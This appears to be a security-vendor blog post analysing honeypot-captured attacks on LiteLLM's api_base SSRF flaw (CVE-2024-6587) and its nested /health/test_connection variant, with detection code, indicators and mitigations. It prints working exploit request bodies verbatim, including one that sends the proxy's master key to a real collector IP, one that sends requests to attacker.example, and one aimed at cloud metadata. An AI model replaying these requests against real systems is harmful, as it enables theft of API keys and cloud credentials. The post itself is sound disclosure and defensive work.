• Zenity Labs

Threat Actors Are Trying to Turn LiteLLM's Connection-Test Into a Key-Exfiltration Channel

A closer look at api_base SSRF (CVE-2024-6587) activity in the wild, and its nested variant

Between April and June 2026, our honeypot sensors recorded more than 2,000 requests against LiteLLM's admin API that set api_base to an attacker-controlled host and api_key to os.environ/LITELLM_MASTER_KEY.

This pattern abuses CVE-2024-6587, a Server-Side Request Forgery (SSRF) flaw disclosed on 2024-09-13 and fixed in LiteLLM 1.44.8. The catch is that the bulk of what we saw does not hit the endpoint the patch protects. Instead, it hits a nested variant that has so far been mentioned only in niche cybersecurity blogs.

LiteLLM and api_base: the connection-test as attack surface

LiteLLM is a widely deployed AI gateway that fronts many LLM providers behind one OpenAI-style API. api_base is simply the upstream URL LiteLLM forwards a given model’s requests to, for example https://api.openai.com. Also relevant to the suspicious activity caught by our sensors is the /health/test_connection endpoint. This is a convenience meant for developers, a “does this model config actually work?” button that takes a model config, including api_base, and makes an outbound call to test it. In short, the api_base parameter supplies the where, and the endpoint supplies the go.

The api_base SSRF: CVE-2024-6587

CVE-2024-6587 covers the POST /chat/completions endpoint. When a LiteLLM proxy is configured with an OpenAI key in its environment (OPENAI_API_KEY) and a request sets api_base to a server the attacker controls, the proxy forwards the request, along with that configured key, to that server, where the attacker simply reads it from their own logs (CVSS 7.5). The original report's proof of concept looks like this (huntr 4001e1a2, NVD):

POST /chat/completions

{"model": "gpt-3.5-turbo",
 "messages": [{"role": "user", "content": "hello"}],
 "api_base": "https://attacker.example"}

The 1.44.8 fix added a guard, is_request_body_safe(), that rejects api_base in the request body. But that guard is a flat, top-level check: it looks for api_base as a top-level key and never recurses into the litellm_params object. So any endpoint that nests api_base inside litellm_params, like /health/test_connection and /model/new, sails straight past the check. That nested bypass is the live variant we observed.
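To illustrate why a top-level check misses the nested case, here is a minimal Python sketch. The names flat_check, recursive_check and BANNED_KEYS are hypothetical and are not LiteLLM's code; they only contrast the two strategies described above.

```python
from typing import Any

BANNED_KEYS = {"api_base"}  # assumption: the key the guard is meant to reject


def flat_check(body: dict) -> bool:
    """Return True if the body looks safe when only top-level keys are inspected."""
    return not any(key in BANNED_KEYS for key in body)


def recursive_check(value: Any) -> bool:
    """Return True only if no banned key appears at any nesting depth."""
    if isinstance(value, dict):
        for key, child in value.items():
            if key in BANNED_KEYS or not recursive_check(child):
                return False
        return True
    if isinstance(value, list):
        return all(recursive_check(item) for item in value)
    return True


# The classic CVE shape: api_base at the top level of the body.
classic = {"model": "gpt-3.5-turbo", "api_base": "https://attacker.example"}
# The nested shape: api_base hidden one level down, inside litellm_params.
nested = {"litellm_params": {"model": "azure/gpt-4o",
                             "api_base": "https://attacker.example"}}
```

Here flat_check rejects classic but accepts nested, while recursive_check rejects both. A real fix also has to decide which callers may legitimately set api_base, so this shows the gap rather than a drop-in patch.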

The nested /health/test_connection variant stayed exploitable far longer: we reproduced the full secret exfiltration on v1.74.0, v1.81.0, and v1.82.0. It was finally closed in LiteLLM's 1.83.x hardening. In our lab, v1.83.14 (released on 2026-04-27) rejects the same request with "Environment variable references are not permitted in request parameters."

Design pattern exposure

Three design choices create the exposure:

  • The proxy trusts a client-supplied api_base and will connect to it.

  • It resolves os.environ/VAR references server-side, a documented config convenience (LiteLLM's own quickstart config uses api_key: os.environ/AZURE_API_KEY). As a result, api_key: "os.environ/LITELLM_MASTER_KEY" is replaced on the wire with the real key stored in the environment and sent to the attacker-controlled server supplied in the api_base field.

  • The CVE-2024-6587 fix checks only the top-level request body, leaving the nested sinks reachable. 1.83.x hardening blocked os.environ references in request bodies.
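The interaction between reference resolution and client-supplied parameters can be sketched in a few lines of Python. This is an illustration under assumptions, not LiteLLM's implementation: resolve_secret_ref and reject_env_refs are hypothetical names, and only the error text is taken from the v1.83.14 response quoted earlier.

```python
import os
from typing import Any

ENV_PREFIX = "os.environ/"


def resolve_secret_ref(value: str, env=os.environ) -> str:
    """Illustrative resolver: swap 'os.environ/VAR' for the value of VAR."""
    if value.startswith(ENV_PREFIX):
        return env.get(value[len(ENV_PREFIX):], "")
    return value


def reject_env_refs(value: Any) -> None:
    """Raise ValueError if any string at any depth is an env reference."""
    if isinstance(value, str) and value.startswith(ENV_PREFIX):
        raise ValueError(
            "Environment variable references are not permitted in request parameters."
        )
    if isinstance(value, dict):
        for child in value.values():
            reject_env_refs(child)
    elif isinstance(value, list):
        for item in value:
            reject_env_refs(item)
```

The design point is that resolution is reasonable for operator-written config but not for request bodies. Running a check like reject_env_refs on every client-supplied body before any resolver sees it keeps the two trust levels apart.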

Suspicious activity breakdown

  • We captured 2,721 requests from 21 source IPs, between 2026-04-07 and 2026-06-01.

  • The split tells the story: 2,704 hit POST /health/test_connection (the nested variant), 16 hit POST /chat/completions (the classic CVE shape, all aimed at cloud metadata), and 1 hit POST /model/new.

  • All 2,704 /health/test_connection requests used a single spoofed desktop-Chrome User-Agent across many cloud IPs, the signature of one automated tool behind rotating addresses. Each IP appeared on a single day, typically sending exactly 159 requests.

The exact request, and what the proxy does with it

This is the captured /health/test_connection body, verbatim (only the api_base host varied across sources):

POST /health/test_connection HTTP/1.1
Host: <litellm-host>:4000
Authorization: Bearer sk-1234
Content-Type: application/json

{"litellm_params":{
   "model":"azure/gpt-4o",
   "custom_llm_provider":"azure",
   "api_base":"http://8.211.153.13:18182/openai/v1",
   "api_key":"os.environ/LITELLM_MASTER_KEY",
   "api_version":"2024-12-01-preview",
   "extra_headers":{"api-key-site":"http://<victim-proxy>:4000",
                    "api-key-env":"LITELLM_MASTER_KEY"}
   },
 "mode":"chat"}

Three things to notice:

  • api_base points at an attacker host (8.211.153.13:18182), the collector that will receive the proxy's outbound call.

  • api_key is the literal string os.environ/LITELLM_MASTER_KEY, which is an instruction telling LiteLLM to read that environment variable and use its value rather than a literal key.

  • extra_headers is attacker bookkeeping: api-key-site is set to the victim sensor's own address (so the operator knows which target phoned home) and api-key-env records which environment variable is being harvested.

We reproduced it: os.environ/LITELLM_MASTER_KEY is resolved to the real key on the wire

To see what a real vulnerable proxy does, we replayed the captured request against a live LiteLLM instance (v1.74.0) with a master key set to sk-1234, pointing api_base at a logging collector. The request goes in with an os.environ directive, and the proxy's outbound call arrives at the collector with the secret resolved:

POST /openai/v1/openai/deployments/gpt-4o/chat/completions?api-version=2024-12-01-preview
host: <collector>
api-key: sk-1234                          <-- os.environ/LITELLM_MASTER_KEY resolved to the real master key
api-key-site: http://<victim-proxy>:4000  <-- attacker bookkeeping, echoed onto the outbound
api-key-env: LITELLM_MASTER_KEY
user-agent: AsyncAzureOpenAI/Python 2.41.1
content-type: application/json

{"messages":[{"role":"user","content":"What's 1 + 1?"}],"model":"gpt-4o"}

The proxy then reports success to the caller, while the stolen key has already been sent to the attacker-controlled endpoint given in api_base. That is the entire exploit: in as os.environ/LITELLM_MASTER_KEY, out as api-key: sk-1234.
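For defenders who want to repeat this check against their own lab instance, a logging collector can be sketched with Python's standard library. This is not the collector we used; the names CollectorHandler, secret_headers and make_collector are hypothetical, and the sketch assumes the secret arrives in an api-key or authorization header.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

SENSITIVE_HEADERS = ("api-key", "authorization")  # assumption: where a resolved secret lands


def secret_headers(headers) -> dict:
    """Return the sensitive headers of a request, keyed by lower-cased name."""
    return {name.lower(): value for name, value in headers.items()
            if name.lower() in SENSITIVE_HEADERS}


class CollectorHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        self.rfile.read(length)  # drain the body so the client is not left waiting
        for name, value in secret_headers(self.headers).items():
            print(f"{self.path}: {name} arrived as {value!r}")
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(b"{}")

    def log_message(self, fmt, *args):
        pass  # silence the default per-request stderr logging


def make_collector(port: int = 0) -> HTTPServer:
    """Bind on loopback only; port 0 lets the OS choose a free port."""
    return HTTPServer(("127.0.0.1", port), CollectorHandler)
```

Calling make_collector(18182).serve_forever() starts the listener. The empty JSON reply is a simplification, so the proxy's response to the caller may differ from the success described above; the headers are printed either way. Use a throwaway key and an isolated network for any such test.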

Authentication: /health/test_connection is gated only if a master key, otherwise known as the key to the AI Gateway, is set. We tested the conditions that let the captured request execute on a real proxy:

| Deployment state | Request | Result |
|---|---|---|
| master key = sk-1234 (the docs example) | Authorization: Bearer sk-1234 | call fires (attacker knows the example key, can hijack other keys on the proxy) |
| no master key set | no Authorization header | call fires (any request is accepted) |
| no master key set | Authorization: Bearer sk-<RANDOM> | call fires (any token is accepted) |

In other words, the attack lands when the proxy has no master key (any token, or none, is accepted) or when the master key is left at the docs default sk-1234 (also seen in .env.example), which the attacker simply knows.
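The two exposed states can be checked at deploy time. The sketch below assumes the key is supplied through the LITELLM_MASTER_KEY environment variable; a key set elsewhere, such as a config file, would need its own check. master_key_state and KNOWN_DEFAULT_KEYS are hypothetical names.

```python
import os

KNOWN_DEFAULT_KEYS = {"sk-1234"}  # the docs example key named in this post


def master_key_state(env=os.environ) -> str:
    """Classify the deployment as 'unset', 'default' or 'custom'."""
    key = env.get("LITELLM_MASTER_KEY", "").strip()
    if not key:
        return "unset"      # any token, or none, would be accepted
    if key in KNOWN_DEFAULT_KEYS:
        return "default"    # the attacker already knows this value
    return "custom"
```

A startup script could refuse to launch the proxy unless master_key_state() returns "custom".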

The other interesting shape: SSRF into the IMDS endpoint

The 16 /chat/completions requests pointed api_base at the cloud metadata service:

POST /chat/completions

{"model":"gpt-4","api_base":"http://169.254.169.254/latest/meta-data/",
 "messages":[{"role":"user","content":"x"}]}

169.254.169.254 is the link-local address every major cloud uses for instance metadata, the path to short-lived IAM credentials. On a vulnerable proxy this is SSRF straight into the cloud identity of the host. 

Assessment

What sets the activity apart is the payload: these are working secret-exfiltration primitives aimed at two fixed, attacker-controlled collectors, so the harvesting intent is built into the request itself. Running the source IPs through VirusTotal tells us more about who we are dealing with. Three are already flagged as malicious by multiple vendors, and all three were running the /health/test_connection secret-harvesting sweep (the os.environ exfiltration to the attacker's collectors):

  1. 135.232.232.53 (159 requests)

  2. 52.161.69.168 (106 requests) 

  3. 172.190.102.150 (53 requests) 

Notably, all three of these senders are Microsoft Azure addresses (AS 8075), pointing to abused cloud accounts rather than the operator's own hosts. The two smaller actors are flagged as well:

  1. the metadata-SSRF IP 164.52.192.134 (MalwareURL, SOCRadar, GreyNoise), which pointed api_base at the cloud metadata service to pull the host's IAM credentials and also appears in our LiteLLM guardrails and control-plane findings,

  2. the /model/new IP 191.102.179.47 (GreyNoise), which planted an attacker-controlled api_base into a stored model.

What to block

Abused endpoints

Alert on any external POST to LiteLLM admin endpoints whose body carries an api_base:

  • /health/test_connection

  • /chat/completions

  • /model/new

Request-body signatures

  • An api_base pointing off-box combined with "api_key":"os.environ/..." (any environment-variable reference), and any api_base set to 169.254.169.254.

  • Attacker bookkeeping: extra_headers carrying api-key-site and api-key-env, which fingerprint this tool.
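The signatures above can be expressed as a small body matcher. This is a sketch with hypothetical names (match_signatures, walk, host_of), not a production rule. As a simplification, it flags any api_base paired with an os.environ reference rather than trying to decide what counts as off-box.

```python
import json
from typing import Any, Iterator, Optional
from urllib.parse import urlsplit

METADATA_HOSTS = {"169.254.169.254"}
BOOKKEEPING_HEADERS = {"api-key-site", "api-key-env"}


def walk(value: Any) -> Iterator[dict]:
    """Yield every dict found at any depth of a parsed JSON value."""
    if isinstance(value, dict):
        yield value
        for child in value.values():
            yield from walk(child)
    elif isinstance(value, list):
        for item in value:
            yield from walk(item)


def host_of(url: str) -> Optional[str]:
    """Return the URL's hostname, or None if it cannot be parsed."""
    try:
        return urlsplit(url).hostname
    except ValueError:
        return None


def match_signatures(raw_body: str) -> set:
    """Return the names of the signatures that the request body matches."""
    hits = set()
    try:
        body = json.loads(raw_body)
    except ValueError:
        return hits  # not JSON, nothing to match
    for node in walk(body):
        api_base, api_key = node.get("api_base"), node.get("api_key")
        if isinstance(api_base, str):
            if host_of(api_base) in METADATA_HOSTS:
                hits.add("metadata_api_base")
            if isinstance(api_key, str) and api_key.startswith("os.environ/"):
                hits.add("env_ref_with_api_base")
        extra = node.get("extra_headers")
        if isinstance(extra, dict) and BOOKKEEPING_HEADERS <= {k.lower() for k in extra}:
            hits.add("bookkeeping_headers")
    return hits
```

Because walk visits every nested object, the matcher sees api_base whether it sits at the top level or inside litellm_params.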

Collector hosts (key-exfil destinations)

IPs for outbound LiteLLM traffic

  • 8.211.153.13

  • 138.2.105.182

Source IPs (every IP we saw, with attributed activity)

Secret-harvesting sweep

os.environ exfil via /health/test_connection, exfiltrating to collector 8.211.153.13:18182

  • 47.251.51.235

  • 43.110.133.208

  • 47.251.252.26

  • 52.161.178.107

  • 64.236.201.21

  • 47.251.15.169

  • 128.24.161.192

  • 135.232.232.53

  • 192.240.199.159

  • 192.240.199.139

  • 131.153.241.57

  • 52.161.69.168

  • 172.190.102.150

Secret-harvesting sweep, exfiltrating to collector 138.2.105.182

  • 192.240.199.127 

  • 125.253.75.79

  • 131.153.240.133

  • 125.253.88.99

  • 192.240.199.97

  • 34.229.38.104

Cloud-metadata SSRF via /chat/completions:

  • 164.52.192.134 (16: 14 at 169.254.169.254, 2 at its own host 164.52.192.134:8888; also seen in our guardrails and control-plane findings)

Config-persistence via /model/new:

  • 191.102.179.47 (1: planted api_base: http://127.0.0.1:1 into a stored model)

Recommendations

  • Set a strong master key, and make sure one is set at all. With no master key, LiteLLM accepts any token; with the docs-default sk-1234, the attacker already knows it. Rotate LITELLM_MASTER_KEY off any default and treat it as compromised if a default was ever live.

  • Egress-filter the proxy: deny outbound model traffic to link-local and metadata addresses (169.254.169.254), loopback, RFC-1918 ranges and any other unapproved host. The in-app guard does not cover the nested sinks.

  • Upgrade to LiteLLM 1.83.x or later. The 1.44.8 fix covers only the top-level /chat/completions case, so do not rely on it for /health/test_connection. We confirmed v1.83.14 rejects os.environ references in request parameters, which closes this secret-theft path. Whatever the version, keep the control plane on an internal network behind auth.
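The egress recommendation can also be mirrored at the application layer with Python's ipaddress module. This is a sketch under assumptions: ALLOWED_HOSTS, ip_is_internal and destination_allowed are hypothetical names, the allowlist content is a placeholder, and a check like this complements network-level egress filtering rather than replacing it.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.openai.com"}  # assumption: replace with your approved upstreams


def ip_is_internal(ip: str) -> bool:
    """True for loopback, link-local (incl. 169.254.169.254), private and similar ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True  # unparseable address: fail closed
    return (addr.is_loopback or addr.is_link_local or addr.is_private
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def destination_allowed(url: str, resolve=socket.getaddrinfo) -> bool:
    """Allow only approved hostnames whose every resolved address is external."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return False
    if host is None or host.lower() not in ALLOWED_HOSTS:
        return False
    try:
        infos = resolve(host, None)
    except OSError:
        return False  # resolution failed: fail closed
    # Each getaddrinfo entry ends with a sockaddr tuple whose first item is the IP.
    return bool(infos) and not any(ip_is_internal(info[4][0]) for info in infos)
```

Checking the resolved addresses as well as the hostname guards against an approved name that resolves to an internal address. DNS can still change between the check and the connection, which is one reason the network-level filter remains the primary control.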

Why it matters

This is automated credential theft, and we verified the payoff in the lab: a single connection-test request makes a vulnerable proxy hand the keys held in its environment to an attacker-controlled server, or fetch cloud metadata for IAM credentials. With such keys, an attacker can control the gateway and bill inference to the victim; with metadata credentials, they can pivot into the cloud account. The patch closed the front door (/chat/completions) more than eighteen months ago, and this activity is attackers walking in through a side door that the same design pattern left open.

  1. CVE-2024-6587: GitHub Advisory GHSA-g26j-5385-hhw3 and NVD.

  2. Escape: the nested api_base bypass
